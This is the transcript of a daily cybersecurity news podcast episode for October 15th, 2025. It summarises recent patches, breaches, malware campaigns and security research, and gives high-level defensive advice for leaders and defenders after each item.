Subscribe
Share
Share
Embed
The BCM Daily Cyber News brings you clear, timely updates on threats, breaches, patches, and trends every day. Stay informed in minutes with focused audio built for busy professionals. Learn more and explore at BareMetalCyber.com.
This is today’s cyber news for October 15th, 2025. You can also subscribe to the highly detailed newsletter and view the archive of previous headlines at daily cyber dot news.
Microsoft’s October patch fixed 172 flaws, including six zero-days, as Windows 10 loses free security updates. This creates both urgent risk and a business choice between Extended Security Updates and moving to Windows 11. Leaders: set a 30-day plan for Windows 10 estates and track progress weekly. Defenders: deploy zero-day patches within 48 hours and watch for post-patch exploit attempts and patch-compliance gaps. If rollout slips, apply mitigations, isolate high-risk users, and verify compliance daily.
The U.K. cyber agency says major incidents more than doubled, driven by state groups and criminals targeting critical services and suppliers. Expect more disruption via identity abuse and third-party compromise, not just new exploits. Leaders: hold quarterly reviews on identity exposure, vendor risk, and tabletop results. Defenders: shift detections toward identity misuse and supplier-origin changes. Watch for MFA bypass attempts and new OAuth grants; tighten identity monitoring and supplier controls now.
“Pixnapping” research shows Android apps can infer on-screen content like one-time passcodes without special permissions. That weakens “read and type” multi-factor flows, especially for admins, developers, and finance staff. Leaders: move high-privilege users to hardware security keys. Defenders: lock down mobile app installs and watch for low-permission utilities. Enforce hardware MFA for admins; otherwise restrict installs and check devices for unfamiliar tools within 72 hours.
A China-linked group hid a web shell inside ArcGIS Server components and stayed hidden for a year by blending into normal workflows. Niche business platforms are attractive because few teams baseline them. Leaders: fund integrity monitoring and change control for these systems. Defenders: check ArcGIS file integrity and tie admin actions to service accounts. If tampering is suspected, rotate service credentials and review recent exports within 48 hours.
Signed UEFI diagnostic shells on some Framework laptops can bypass Secure Boot, letting attackers run unsigned code before the OS. This expands pre-boot risk for admin and developer machines and for device attestation setups. Leaders: assign clear ownership for firmware risk and include attestation checks. Defenders: enforce current DB/DBX state and block extra UEFI binaries via device management. Apply DBX updates and disable unneeded shells; if not, limit privileged users and verify firmware-policy drift within 24 hours.
“RMPocalypse” shows a single 8-byte write can break AMD SEV-SNP isolation, weakening confidential computing promises. Cloud providers are rolling out microcode and platform fixes, but customers must validate. Leaders: confirm which regions and instance types are mitigated and plan backups. Defenders: inventory SEV-SNP use, patch hosts, and re-check attestation flows. Until patched, keep crown-jewel workloads off unmitigated hosts and verify attestation daily.
Attackers re-uploaded malicious VS Code extensions to Open VSX by rotating names and publishers, stealing tokens, SSH keys, and wallets. Developer machines have broad access, so one bad extension can become a supply-chain breach. Leaders: allow-list extensions and assign marketplace vetting. Defenders: baseline installed extensions and alert on publisher or hash changes. Lock installs to an approved list; if pending, freeze settings sync and verify inventories this week.
Malicious npm, PyPI, and RubyGems packages exfiltrate secrets via Discord webhooks during install or first run. Typosquats and small name tweaks help them slip in, and webhooks evade classic command-and-control checks. Leaders: treat developer-package policy as a real security control with owners and metrics. Defenders: use lockfiles, private mirrors, and reputation checks; block unknown webhook domains. Pin dependencies and route installs through vetted mirrors; if not ready, block Discord webhooks and review build logs.
Microsoft limited parts of Internet Explorer Mode in Edge after real-world exploitation tied to legacy components. The change reduces automatic loading and pushes customers to modernize. Leaders: fund upgrades or safe alternatives for must-have legacy apps. Defenders: audit IE Mode use, trim site lists, and isolate legacy flows. Reduce or remove IE Mode; where needed, narrow the list and monitor affected apps this week.
U.S. and U.K. authorities disrupted a huge pig-butchering fraud network, seizing about $15B in bitcoin and hitting exchanges, mules, and wallets. The scams mix cyber tricks with real-world coercion and will likely rebound. Leaders: invest in transaction monitoring and user education that names these scams. Defenders: tune for mule patterns and crypto off-ramp behavior. Tighten new-payee and payment controls now and add manual reviews for risky transfers.
Researchers found npm packages abusing the unpkg dot com CDN to fetch phishing pages or scripts during install. The trick blends into normal developer setup and can steal credentials for source, cloud roles, or publishing rights. Leaders: assign ownership for package policy and default to “no direct internet installs.” Defenders: enforce lockfiles and private registries and alert on install scripts making external HTTP calls. Block unpkg domains on build hosts and review recent install logs for external fetches.
On-prem Microsoft Exchange Server 2016 and 2019 are now out of support, ending regular security fixes. These servers have a long history of being targeted, so risk will rise quickly. Leaders: set a hard migration deadline with weekly risk reports. Defenders: lock down exposure, enforce modern auth, and monitor closely for exploits during the transition. If you must hold, isolate services and verify logging and detections daily.
A FortiOS flaw lets authenticated users break out of certain CLI restrictions and run arbitrary system commands. That expands insider and partner risk on high-trust network gear. Leaders: require proof of patch status across all devices and clarify delegated access. Defenders: patch, audit admin roles, rotate credentials, and enable tamper-resistant command logging. If maintenance lags, revoke non-essential roles and review command audit trails within 24 hours.
The Astaroth (Guildma) banking trojan hides payloads inside images on GitHub using steganography. Lures fetch images, extract hidden modules, and steal credentials and session tokens, with repos rotating to dodge blocks. Leaders: align fraud and security teams on stealer risks and session protection. Defenders: block suspicious raw-Git fetches and inspect scripted image downloads. Enforce script and binary allow-lists; otherwise rate-limit and check proxy logs for image pulls followed by script execution.
Proofpoint tracked TA585 using “Monster V2” malware with layered delivery and regional lures. The chain moves from email to staging sites to downloader scripts and filters out sandboxes to extend dwell time. Leaders: enforce DMARC and create quick user-reporting and takedown loops. Defenders: block staged downloads and script launches from user-writable paths. Quarantine lookalike lures and verify endpoints block scripts from temp and downloads folders.
Multiple campaigns spoofed OpenAI-style login and “Sora” pages to steal credentials from workers and consumers. The kits use polished domains, valid TLS, and cloud templates, then test stolen passwords across company SSO and developer tools. Leaders: centralize access to approved AI tools and publish a safe sign-in guide. Defenders: block lookalike domains, require conditional access for odd app logins, and hunt for new OAuth grants. Until centralized, block known lookalikes and verify new grants and MFA changes this week.
“PolarEdge” is a backdoor for routers and small gateways that talks over custom TLS and a private binary protocol. It persists via startup scripts, rotates domains, and uses certificates that blend in, then proxies traffic and steals credentials. Leaders: make edge-device ownership explicit and fund it like endpoint security. Defenders: baseline router TLS egress and require signed firmware with auto-updates. Update and lock down edge gear, segment management planes, and review router egress logs for rare destinations over the next 72 hours.
That’s the BareMetalCyber Daily Brief for October 15th, 2025. For more, visit Bare Metal Cyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news. We’re back tomorrow.